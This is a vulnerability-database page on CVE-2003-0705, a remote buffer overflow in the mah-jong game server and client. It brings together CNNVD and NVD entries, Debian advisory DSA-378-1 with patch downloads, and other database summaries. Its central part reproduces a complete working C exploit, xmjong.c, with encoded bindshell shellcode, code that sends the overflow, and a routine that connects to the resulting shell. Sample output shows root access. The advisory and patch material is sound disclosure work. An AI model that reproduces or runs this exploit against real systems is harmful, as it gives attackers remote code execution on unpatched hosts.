CVE-2003-0705
CVSS 7.5
Published: 2003-09-17 00:00:00
Last revised: 2008-09-10 15:20:13

[Original] Buffer overflow in mah-jong 1.5.6 and earlier allows remote attackers to execute arbitrary code.


[CNNVD] Mah-Jong Server Unspecified Remote Buffer Overflow Vulnerability (CNNVD-200309-013)

Mah-Jong Server is a network-based game server program.
Mah-Jong Server contains an unspecified buffer overflow; a remote attacker can exploit it to execute arbitrary instructions on the system with the privileges of the mah-jong service process.
No detailed vulnerability information is currently available.

- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (Affected Platforms and Products)

Product and version information (CPE) not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0705
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0705
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200309-013
(Official data source) CNNVD

- Other Links and Resources

http://www.debian.org/security/2003/dsa-378
(PATCH)  DEBIAN  DSA-378

- Vulnerability Information

Mah-Jong Server Unspecified Remote Buffer Overflow Vulnerability
High risk  Boundary condition error
2003-09-17 00:00:00 2005-10-20 00:00:00
Remote

Mah-Jong Server is a network-based game server program.
Mah-Jong Server contains an unspecified buffer overflow; a remote attacker can exploit it to execute arbitrary instructions on the system with the privileges of the mah-jong service process.
No detailed vulnerability information is currently available.

- Advisories and Patches

        Vendor patches:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-378

- Vulnerability Information (23115)

Mah-Jong 1.4 Client/Server Remote sscanf() Buffer Overflow Vulnerability (EDBID:23115)
linux remote
2003-09-07 Verified
0 V9
N/A [Download]
source: http://www.securityfocus.com/bid/8557/info

A remote buffer overflow vulnerability when calling the sscanf() function has been reported to affect the mah-jong game client and server programs. The issue occurs within separate source files; however, the code used by both programs is identical. It should be noted that the bug must be triggered using different options depending on whether the target is a client or server.

This vulnerability can be exploited to execute arbitrary code with the privileges of the target client or server application. 

/*[ mah-jong[v1.4]: server/client remote buffer overflow exploit. ]*
 *                                                                 *
 * by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo/realhalo)       *
 *                                                                 *
 * compile:                                                        *
 *  cc xmjong.c -o xmjong                                          *
 *                                                                 *
 * syntax:                                                         *
 *  ./xmjong <host|-b> [port] [return address] [offset]            *
 *                                                                 *
 * this program exploits the "SetPlayerOption" command of          *
 * mah-jong's server(mj-server) and the "PlayerOptionSet" command  *
 * of mah-jong's client(mj-player).  while this is an undiscovered *
 * bug, the giant all-purpose patch on debian's package site       *
 * appears to have resolved the issue.  as such, this exploit      *
 * is applied to CAN-2003-0705.                                    *
 *                                                                 *
 * the overflow itself occurs do to an unchecked sscanf() call to  *
 * write to little_buffer[32].  the situation is rather odd do to  *
 * the repetitive nature of dec_pmsg.c/dec_cmsg.c using sscanf()   *
 * to write to little_buffer[32] properly, with limitation         *
 * restrictions, the other 13 times.  the "SetPlayerOption" and    *
 * "PlayerOptionSet" command apparently slipped by.                *
 *                                                                 *
 * the original plan to exploit this bug was by placing the        *
 * shellcode after the overflow itself, in the same                *
 * little_buffer[32](shellcode on the stack) location.  however,   *
 * there happens to not be very much on the stack, so you start    *
 * running into environmental variables quickly.  this is too      *
 * dependent on the environment size, and will often run out of    *
 * bounds on small environments(ie. 0xc0000000 on linux).          *
 *                                                                 *
 * so, instead the shellcode is being placed on the heap in the    *
 * "buffer.1" buffer.  this can be found by running "objdump -x    *
 * mj-?????? | grep buffer.1", where "??????" is "server" or       *
 * "player", depending on what program is being exploited.  once   *
 * the "buffer.1" address is found add 512 to it, this is to skip  *
 * the initial (re-used) junk at the beginning of the buffer.      *
 *                                                                 *
 * bug location:                                                   *
 *  (server-side; dec_pmsg.c)                                      *
 *   316:if ( strcmp(type,"SetPlayerOption") == 0 ) {              *
 *   ...                                                           *
 *   324:if ( sscanf(s,"%s %n",little_string,&n) ==0 ) { warn("pr$ *
 *  (client-side; dec_cmsg.c)                                      *
 *   876:if ( strcmp(type,"PlayerOptionSet") == 0 ) {              *
 *   ...                                                           *
 *   884:if ( sscanf(s,"%s %n",little_string,&n) ==0 ) { warn("pr$ *
 *                                                                 *
 * fix:                                                            *
 *  1.4-2 patch, which can be found on debian's package site.      *
 *                                                                 *
 * exploit workings(commands sent to the server):                  *
 *  (server-side)                                                  *
 *   Connect 1034 0 <shellcode, under 1024 bytes>                  *
 *   SetPlayerOption <pointer overwrite, >32 byte overflow>        *
 *  (client-side)                                                  *
 *   <shellcode, under 1024 bytes>                                 *
 *   PlayerOptionSet <pointer overwrite, >32 byte overflow>        *
 *                                                                 *
 * example usages:                                                 *
 *  (server-side example usage)                                    *
 *   # cc xmjong.c -o xmjong                                       *
 *   # ./xmjong localhost 5000 `objdump -x mj-server|\             *
 *   > grep buffer.1|awk '{print $1}'` 512                         *
 *   [*] mah-jong[v1.4]: server/client remote buffer overflow exp$ *
 *   [*] by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo)          *
 *                                                                 *
 *   [*] target: localhost:5000, return address(buffer.1+512): 0x$ *
 *                                                                 *
 *   [*] attempting to connect: localhost:5000.                    *
 *   [*] successfully connected: localhost:5000.                   *
 *   [*] sending the strings to exploit the overflow.              *
 *   -> Connect 1034 0 ??????????????????????????????????????????$ *
 *   -> SetPlayerOption ?????????????????????????????????????????$ *
 *   [*] checking to see if the exploit was successful.            *
 *   [*] attempting to connect: localhost:45295.                   *
 *   [*] successfully connected: localhost:45295.                  *
 *                                                                 *
 *   Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 ED$ *
 *   uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sy$ *
 *                                                                 *
 *  (client-side example usage)                                    *
 *   # cc xmjong.c -o xmjong                                       *
 *   # ./xmjong -b 5000 `objdump -x mj-player|grep buffer.1|\      *
 *   > awk '{print $1}'` 512                                       *
 *   [*] mah-jong[v1.4]: server/client remote buffer overflow exp$ *
 *   [*] by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo)          *
 *                                                                 *
 *   [*] target: *:5000, return address(buffer.1+512): 0x080733a0. *
 *                                                                 *
 *   [*] awaiting connection from: *:5000.                         *
 *   [*] mah-jong server connection established.                   *
 *   [*] sending the strings to exploit the overflow.              *
 *   -> ?????????????????????????????????????????????????????????$ *
 *   -> PlayerOptionSet ?3???3???3???3???3???3???3???3???3???3???$ *
 *   [*] mah-jong server connection closed.                        *
 *   [*] checking to see if the exploit was successful.            *
 *   [*] attempting to connect: 127.0.0.1:45295.                   *
 *   [*] successfully connected: 127.0.0.1:45295.                  *
 *                                                                 *
 *   Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 ED$ *
 *   uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sy$ *
 *                                                                 *
 * note:                                                           *
 *  this isn't a completely standard stack overflow; however       *
 *  exploitation looks very similar.  as such, standard stack      *
 *  overflow knowledge is all that is needed to understand this.   *
 *                                                                 *
 * (tested on redhat/7.1, squished exploit code as always, also a  *
 * little loose on the comments this time around)      .,,.        *
 ************************* ..,,,.. .  .    ..    . .. (v9fh) ..... */
#include <stdio.h>      /* ;~~     .,;:iil8OO8li:;,,.  `~~'     ~: */
#include <stdlib.h>     /* :    .i48$$$$$$88O88$$$$$88L.      .  . */
#include <stdarg.h>     /* .   (8$$$P"^`...,.``~;88$$$$8)    :$:   */
#include <string.h>     /*    . `l$$bo.``'       `18$$87 .    `  . */
#include <strings.h>    /* .   .  `t$$8Oo4Oo.   i.. ``., i   ..;.  */
#include <signal.h>     /* .    )  ,$87~8O7~ .  lii: .:: l     '   */
#include <unistd.h>     /* i  .'  .487'__-     4$l;  :ii I _---~   */
#include <ctype.h>      /* l `  .o$87 ..ake  .4$$7., ill I ..alo . */
#include <netdb.h>      /* I .oO$87'..     .4$$$7':illII $       . */
#include <sys/socket.h> /* $.`q87' `` .,o4$$$$87   . lI$ $   .     */
#include <sys/types.h>  /* $Oo.~'      `~t88P~`    i I$$ $       . */
#include <sys/time.h>   /* `~'     _   _           l $$$ $.... ..: */
#include <netinet/in.h> /* !filler FakeHalo ascii! ~ ``' ~~~~~~~~~ */
#include <arpa/inet.h>  /*******************************************/
#define DFLADDR (0x0807f7a0+512) /* objdump -x mj-?????? | grep buffer.1 */
#define DFLPORT 5000 /* default port mah-jong server runs on.            */
#define DFLCLMN 80 /* default column value, if no $COLUMNS is defined.   */
#define TIMEOUT 10 /* generic alarm() timeout, simple style.             */
static char x86_exec[]= /* bindshell(45295)&, netric/S-poly.             */
 "\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49\x41\x49\x75"
 "\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0\x06\x9e\x26\x86\xdb\x26"
 "\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95"
 "\x06\xb0\x25\x25\x25\x3b\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28"
 "\x88\xd7\x27\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda"
 "\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b\xa2\x55\x5e"
 "\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85\x05\xa2\x55\x06\x95\x06"
 "\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0"
 "\x85\xd7\xa2\x55\x0e\x98\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95"
 "\x06\x9e\x5e\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16"
 "\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37\x3e\x43\x5e"
 "\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2\x55\x06\x95\x15\xa2\x55"
 "\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0\x6e";
char *getptr(unsigned int);
char *getcode(void);
char *mj_bind(unsigned short,unsigned int);
unsigned short mj_connect(char *,unsigned short,unsigned int);
void getshell(char *,unsigned short);
void filter_text(char *);
void mj_printf(int,char *,...);
void printe(char *,short);
void sig_alarm(){printe("alarm/timeout hit.",1);}
int main(int argc,char **argv){
 unsigned short isbind=0,port=DFLPORT;
 unsigned int ptr=DFLADDR;
 char *hostptr;
 printf("[*] mah-jong[v1.4]: server/client remote buffer overflow ex"
 "ploit.\n[*] by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo)\n\n"); 
 if(argc<2){
  printf("[!] syntax: %s <host|-b> [port] [return address] [offset]\n",
  argv[0]);
  exit(1);
 }
 if(!strcmp(argv[1],"-b"))isbind=1;
 if(argc>2)port=atoi(argv[2]);
 if(argc>3)sscanf(argv[3],"%x",&ptr);
 if(argc>4)ptr+=atoi(argv[4]);
 printf("[*] target: %s:%u, return address(buffer.1+512): 0x%.8x.\n\n",
 isbind?"*":argv[1],port,ptr);
 if(isbind)hostptr=mj_bind(port,ptr);
 else mj_connect((hostptr=argv[1]),port,ptr);
 sleep(1);
 getshell(hostptr,45295); /* defined in shellcode. */
 exit(0);
}
char *getptr(unsigned int newptr){
 unsigned int i=0;
 char *buf;
 if(!(buf=(char *)malloc(128+1)))
  printe("getptr(): allocating memory failed.",1);
 memset(buf,0x0,128+1);
 for(i=0;i<128;i+=4){*(long *)&buf[i]=newptr;}
 return(buf);
}
char *getcode(void){
 char *buf;
 if(!(buf=(char *)malloc(1000+1)))
  printe("getcode(): allocating memory failed",1);
 memset(buf,0x90,(1000-strlen(x86_exec)));
 memcpy(buf+(1000-strlen(x86_exec)),x86_exec,strlen(x86_exec));
 return(buf);
}
char *mj_bind(unsigned short port,unsigned int newptr){
 int ssock=0,sock=0,so=1;
 unsigned int salen=0;
 struct sockaddr_in ssa,sa;
 ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
#ifdef SO_REUSEPORT
 setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
 ssa.sin_family=AF_INET;
 ssa.sin_port=htons(port);
 ssa.sin_addr.s_addr=INADDR_ANY;
 printf("[*] awaiting connection from: *:%d.\n",port);
 if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)
  printe("could not bind socket.",1);
 listen(ssock,1);
 bzero((char*)&sa,sizeof(struct sockaddr_in));
 salen=sizeof(sa);
 sock=accept(ssock,(struct sockaddr *)&sa,&salen);
 close(ssock);
 printf("[*] mah-jong server connection established.\n");
 printf("[*] sending the strings to exploit the overflow.\n");
 mj_printf(sock,"%s\n",getcode());
 mj_printf(sock,"PlayerOptionSet %s\n",getptr(newptr));
 sleep(1);
 close(sock);
 printf("[*] mah-jong server connection closed.\n");
 return(inet_ntoa(sa.sin_addr));
}
unsigned short mj_connect(char *hostname,unsigned short port,
unsigned int newptr){
 int sock;
 struct hostent *t;
 struct sockaddr_in s;
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 s.sin_family=AF_INET;
 s.sin_port=htons(port);
 printf("[*] attempting to connect: %s:%d.\n",hostname,port);
 if((s.sin_addr.s_addr=inet_addr(hostname))){
  if(!(t=gethostbyname(hostname)))
   printe("couldn't resolve hostname.",1);
  memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
 }
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
  printe("mah-jong connection failed.",1);
 alarm(0);
 printf("[*] successfully connected: %s:%d.\n",hostname,port);
 printf("[*] sending the strings to exploit the overflow.\n");
 mj_printf(sock,"Connect 1034 0 %s\n",getcode());
 mj_printf(sock,"SetPlayerOption %s\n",getptr(newptr));
 sleep(1);
 close(sock);
 return(0);
}
void getshell(char *hostname,unsigned short port){
 int sock,r;
 fd_set fds;
 char buf[4096+1];
 struct hostent *he;
 struct sockaddr_in sa;
 printf("[*] checking to see if the exploit was successful.\n");
 if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  printe("getshell(): socket() failed.",1);
 sa.sin_family=AF_INET;
 if((sa.sin_addr.s_addr=inet_addr(hostname))){
  if(!(he=gethostbyname(hostname)))
   printe("getshell(): couldn't resolve.",1);
  memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
  sizeof(sa.sin_addr));
 }
 sa.sin_port=htons(port);
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 printf("[*] attempting to connect: %s:%d.\n",hostname,port);
 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
  printf("[!] connection failed: %s:%d.\n",hostname,port);
  return;
 }
 alarm(0);
 printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
 signal(SIGINT,SIG_IGN);
 write(sock,"uname -a;id\n",13);
 while(1){
  FD_ZERO(&fds);
  FD_SET(0,&fds);
  FD_SET(sock,&fds);
  if(select(sock+1,&fds,0,0,0)<1)
   printe("getshell(): select() failed.",1);
  if(FD_ISSET(0,&fds)){
   if((r=read(0,buf,4096))<1)
    printe("getshell(): read() failed.",1);
   if(write(sock,buf,r)!=r)
    printe("getshell(): write() failed.",1);
  }
  if(FD_ISSET(sock,&fds)){
   if((r=read(sock,buf,4096))<1)exit(0);
   write(1,buf,r);
  }
 }
 close(sock);
 return;
}
void filter_text(char *ptr){
 unsigned int i=0,columns=DFLCLMN;
 if(getenv("COLUMNS"))columns=atoi(getenv("COLUMNS"));
 if(7>columns||columns>256)columns=DFLCLMN;
 for(i=0;i<strlen(ptr);i++){
  if(i>=(columns-3)){
   ptr[i--]=0x0;
   ptr[i--]='.';
   ptr[i--]='.';
   ptr[i]='.';
  }
  else if(ptr[i]=='\r'||ptr[i]=='\n')ptr[i]=0x0;
  else if(!isprint(ptr[i]))ptr[i]='?';
 }
 return;
}
void mj_printf(int sock,char *fmt,...){
 char *buf;
 va_list ap;
 if(!(buf=(char *)malloc(1024+1)))
  printe("mj_printf(): allocating memory failed.",1);
 memset(buf,0x0,1024+1);
 va_start(ap,fmt);
 vsnprintf(buf,1024,fmt,ap);
 va_end(ap);
 write(sock,buf,strlen(buf));
 filter_text(buf);
 printf("-> %s\n",buf);
 free(buf);
 return;
}
void printe(char *err,short e){
 printf("[!] %s\n",err);
 if(e)exit(1);
 return;
}
		

- Vulnerability Information (F31607)

DSA-378-1 (PacketStormID:F31607)
2003-09-10 00:00:00
Matt Zimmerman,Nicolas Boullis  debian.org
advisory,remote,denial of service,vulnerability
linux,debian
CVE-2003-0705,CVE-2003-0706
[Download]

Debian Security Advisory DSA 378-1 - Two vulnerabilities have been found in the Mah-Jong server version 1.4 and below. One enables a remote attacker to gain privileges of the user running the server while the other leads to a denial of service.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 378-1                     security@debian.org
http://www.debian.org/security/                             Matt Zimmerman
September 7th, 2003                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : mah-jong
Vulnerability  : buffer overflows, denial of service
Problem-Type   : remote
Debian-specific: no
CVE Ids        : CAN-2003-0705 CAN-2003-0706

Nicolas Boullis discovered two vulnerabilities in mah-jong, a
network-enabled game.

 - CAN-2003-0705 (buffer overflow)

   This vulnerability could be exploited by a remote attacker to
   execute arbitrary code with the privileges of the user running the
   mah-jong server.

- - CAN-2003-0706 (denial of service)

  This vulnerability could be exploited by a remote attacker to cause
  the mah-jong server to enter a tight loop and stop responding to
  commands.

For the stable distribution (woody) these problems have been fixed in
version 1.4-2.

For the unstable distribution (sid) these problems have been fixed in
version 1.5.6-2.

We recommend that you update your mah-jong package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2.dsc
      Size/MD5 checksum:      579 b473dfb32c1765f3b96a1d4897a728a5
    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2.diff.gz
      Size/MD5 checksum:    23814 c0465cd149b6f9bfc7f0096ab5d0d192
    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4.orig.tar.gz
      Size/MD5 checksum:   259474 21cc99ddb9ae91cbe02b2119586f8860

  Alpha architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_alpha.deb
      Size/MD5 checksum:   311378 0ff83a703283cad7faa06609d330d9ef

  ARM architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_arm.deb
      Size/MD5 checksum:   272324 e6974d354918f6f4d0dffa3bb3eb4b9f

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_i386.deb
      Size/MD5 checksum:   250012 a4f7d586918c3a712d073aa9e8e42bd5

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_ia64.deb
      Size/MD5 checksum:   379856 b63ee72a1a2f4ac16e902ae0f8b5b3e1

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_hppa.deb
      Size/MD5 checksum:   286728 c4c544f15f09199b753848cb7ee417d9

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_m68k.deb
      Size/MD5 checksum:   234410 91682fc41ab6fb8b57ebfb09681f3180

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_mips.deb
      Size/MD5 checksum:   261874 977e1d059bbaca988a3cb60636e74d17

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_mipsel.deb
      Size/MD5 checksum:   261666 45e1785dd5c17dcbec971fc8024b8787

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_powerpc.deb
      Size/MD5 checksum:   271566 5d25f219fdb987ca014775ae4ae9ee9c

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_s390.deb
      Size/MD5 checksum:   246116 be071c93713eb1257f9a8b8225968ad8

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_sparc.deb
      Size/MD5 checksum:   269392 78b122c5b4145b039dda06d4e16cfe48

  These files will probably be moved into the stable distribution on
  its next revision.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQE/W7VAArxCt0PiXR4RAlMPAJ9oD49qKrE9OK4LEHnVtA4dCfcM+QCcDPk/
w5fxjmEjVzpNWzgcO/lBpsQ=
=t7CW
-----END PGP SIGNATURE-----
    

- Vulnerability Information

6586
mah-jong Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Unknown

- Vulnerability Description

A remote overflow exists in mah-jong. With a specially crafted request, an attacker can cause mah-jong to execute arbitrary code with the permissions of the user running mah-jong on the server resulting in a loss of integrity.

- Timeline

2003-09-07 Unknown
Unknown Unknown

- Solution

Upgrade to version 1.4-2, 1.5.6-2, or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author

- Vulnerability Information

Mah-Jong Client/Server Remote sscanf() Buffer Overflow Vulnerability
Boundary Condition Error 8557
Yes No
2003-09-07 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Nicolas Boullis.

- Affected Software Versions

Nicolas Boullis Mah-Jong 1.4
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha

- Vulnerability Discussion

A remote buffer overflow vulnerability when calling the sscanf() function has been reported to affect the mah-jong game client and server programs. The issue occurs within separate source files; however, the code used by both programs is identical. It should be noted that the bug must be triggered using different options depending on whether the target is a client or server.

This vulnerability can be exploited to execute arbitrary code with the privileges of the target client or server application.

- Exploit

An exploit has been developed and released by vade79 and is available below.

- Solution

Debian have released an advisory (DSA 378-1), which contains fixes to address this issue. Affected users are advised to upgrade as soon as possible. Further details regarding applying fixes are available in the referenced advisory.

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site].

Copyright Notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are maintained on MITRE's websites.